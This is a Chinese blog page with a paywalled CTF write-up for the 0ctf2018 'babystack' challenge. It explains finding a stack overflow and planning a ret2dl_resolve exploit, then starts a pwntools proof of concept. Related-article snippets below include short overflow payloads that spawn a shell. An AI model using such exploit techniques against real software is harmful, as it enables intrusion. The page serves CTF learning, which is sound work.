0ctf2018-babystack_writeup

最新推荐文章于 2025-05-19 09:09:41 发布
最新推荐文章于 2025-05-19 09:09:41 发布
阅读量1k 收藏 2
点赞数
CC 4.0 BY-SA版权
分类专栏: 代码
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/CabbageWind/article/details/108004356
这篇博客详细介绍了0ctf2018-babystack挑战的解决过程,包括检查保护机制、发现栈溢出漏洞、计算read位置偏移、利用dl_resolve攻击方式来构造栈并编写POC。在解决问题的过程中,作者遇到了如read函数缓冲区处理和dlsym表定位的问题,并给出了相应的解决策略。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

题目:0ctf2018-babystack

1.检查保护机制:
在这里插入图片描述

可以看到程序只提供了NX保护。

2.在IDA中进行反编译,发现一个可读的位置,存在栈溢出漏洞,可能可以利用:
在这里插入图片描述

3.使用peda计算read位置的偏移:
在这里插入图片描述

得到read位置距离返回地址的偏移为44,比read的长度0x40小,说明栈溢出漏洞可直接被利用。

4.查看文件ELF表
在这里插入图片描述

通过elf表中查看得知程序中不存在system函数,无法直接跳转;也不存在输出函数,无法打印got表地址。

5.查看vmmap
在这里插入图片描述

通过vmmap可以看到bss段可写,故尝试dl_resolve攻击方式。

6.构造栈
在这里插入图片描述

7.编写POC

from pwn import *
name = './babystack'
p = process(name)
elf= ELF(name)
#获取原地址
rel_plt_addr = elf.get_section_by_name('.rel.plt').header
最低0.47元/天 解锁文章

200万优质内容无限畅学
xman 厦门邀请赛 pwn1 babystack writeup
qq_39596232的博客
09-07 605
题目描述: 这个题目针对现在的我还是有点难度的,花费了我三天的时间,最后发现原因竟是因为字符转化为整型的过程中多加了好多0. 分析思路: 1、首先查看文件的详细信息: tucker@ubuntu:~/xman/pwn/pwn1$ file babystack babystack: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), d...
CTF-Crypto实战-2023红队】Babystack
Cra_Thursday9527的博客
07-28 276
改为远程调试io = remote(“172.16.30.11”,18006)溢出buffer覆盖ebp+4地址段为shell 入口地址即可即可完成。
(BUUCTF)starctf2018_babystack
xy1458214551的博客
11-29 373
BUUCTF上的starctf2018_babystack题解
NSSCTF [BJDCTF 2020]babystack
最新发布
2401_88087539的博客
05-19 327
pwn新手小白,写完题后整理的一点点思路,有借鉴其他wp,有任何问题各位师傅可以提出,接收批评指正
TLS:starctf2018_babystack
qq_60209620的博客
04-17 357
字段,单个线程的 canary 值就存放在这里,函数退出时就是从这里取值与canary做异或。所以我们还是精准覆盖,计算方法如下:我们输入数据的位置在0x7ffff77c0ee0,然后用。字段之间的偏移,因为我尝试过多覆盖一点,但是这样会发生错误,可能是其他数据不能覆盖吧?那么接下来我们就需要找到输入点与。漏洞函数:可以栈溢出。
CTF】bjdctf_2020_babystack 1
凉水的博客
01-21 1564
解题思路: 1 先反编译: undefined8 main(void) { undefined local_18 [12]; uint local_c; setvbuf(stdout,(char *)0x0,2,0); setvbuf(stdin,(char *)0x0,1,0); local_c = 0; puts("**********************************"); puts("* Welcome to the BJDCTF! *
[buuctf]bjdctf_2020_babystack
逆向萌新的博客
06-19 1014
[buuctf]bjdctf_2020_babystack
2021-09-20 BUUCTF WriteUP(堆/字符串/栈)
m0_56897090的博客
09-20 747
文章目录堆类综合模型总结pwnable_hacknote分析EXPhitcontraining_bamboobox分析EXPnpuctf_2020_easyheap分析EXPciscn_2019_es_1分析EXPhitcontraining_unlink分析EXPgyctf_2020_some_thing_exceting分析EXP栈溢出综合模型总结picoctf_2018_shellcode分析EXPjarvisoj_level5分析EXPcmcc_pwnme2分析EXPactf_2019_babyst
BUUCTF_WriteUp 2021-08-23
m0_56897090的博客
08-23 509
2021-08-23 文章目录2021-08-23shell_asm题目描述题目分析BabyROP题目描述解题思路0x01 整体思路0x02 额外前置知识:0x03 expnot_the_same_3dsctf_20160x01 解题思路0x02 expBJDCTF-babystack0x01 解题思路0x02 Expjarvisoj_level20x01 整体分析0x02 exp32位0x03 64位解法get_started_3dsctf_20160x01 程序整体分析预期解法解法2:mprotectc
pwn1 babystack [XCTF-PWN][高手进阶区]CTF writeup攻防世界题解系列19
重新启程
12-25 1804
题目地址:pwn1 babystack 已经到了高手进阶区的第八题了,已经渐入佳境了。哈哈! 废话不说,看看题目先 厦门邀请赛的题目,还是2星难度,那就开工了。 管理检查一下保护机制: [*] '/ctf/work/python/pwn1/babystack' Arch: amd64-64-little RELRO: Full RELRO Stac...
buuctf actf_2019_babystack
weixin_45441024的博客
12-07 593
buuctf actf_2019_babystack from pwn import * from LibcSearcher import LibcSearcher r = remote("node3.buuoj.cn",27848) elf = ELF("/home/pwn/Desktop/ACTF_2019_babystack") nbytes_length = 0xE0 offset = 0xD0 leave_retn = 0x00400A4E puts_got = elf.got["puts"]
Babystack
pppp974的博客
08-19 538
#!/usr/bin/env python from pwn import * elf=ELF('./babystack') libc=ELF('./libc-2.23.so') p=remote('111.198.29.45',30865) prdi_addr=0x400a93 main_addr=0x400908 one_gadget=0x45216//找到库中('bin/sh')的相对地址 ...
linux_kernal_pwn 2018 0CTF Finals Baby Kernel
yongbaoii的博客
09-01 303
看看保护,似乎没啥保护。 其实看到它不是单核单线程,猜测可能会有条件竞争。 挂载文件时baby.ko 来看程序 __int64 __fastcall sub_25(__int64 a1, int a2, __int64 a3) { __int64 result; // rax int i; // [rsp+1Ch] [rbp-54h] if ( a2 == 26214 ) { printk("Your flag is at %px! But I don't think you kn
2018 0CTF Finals Baby Kernel
weixin_46483787的博客
04-14 434
学kernel的第三天,仍然很不想学 拿到题目先看看启动项 #!/bin/sh mount -t proc none /proc mount -t sysfs none /sys mount -t devtmpfs devtmpfs /dev echo "flag{this_is_a_sample_flag}" > flag chown root:root flag chmod 400 flag exec 0</dev/console exec 1>/dev/console exec 2
bjdctf_2020_babystack
、moddemod
06-13 818
exp from pwn import * context(log_level = 'debug') proc_name = './bjdctf_2020_babystack' elf = ELF(proc_name) # p = process(proc_name) p = remote('node3.buuoj.cn', 29943) pop_ret = 0x400833 system_addr = elf.sym['system'] bin_sh_str = 0x400858 payload =..
buuctf-bjdctf_2020_babystack(pwn)
2301_81574836的博客
02-18 740
buuctf-bjdctf_2020_babystack(pwn)题解
CTF】bjdctf_2020_babystack2
凉水的博客
06-30 706
bjdctf_2020_babystack2
[BJDCTF 2020]babystack2.0 CTF-PWN
m0_72904009的博客
05-13 447
[BJDCTF 2020]babystack2.0 CTF-PWN
CTF buuoj pwn-----第10题: bjdctf_2020_babystack
热门推荐
bing_Max的博客
09-28 2万+
思路 本体有后门函数, 最简单的是直接调用. 这里想用一下system函数,一开始忘了是32位的,写了个payload_1 = b’a’*(0x10+8) + p64(system_addr)+p64(1)+p64(binsh_addr) 显然不成功 后来反映过来, 写了payload_1 = b’a’*(0x10+8) + p64(pop_rdi_addr)+p64(binsh_addr)+p64(system_addr),成功获取flag 编写exp from pwn import * con
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值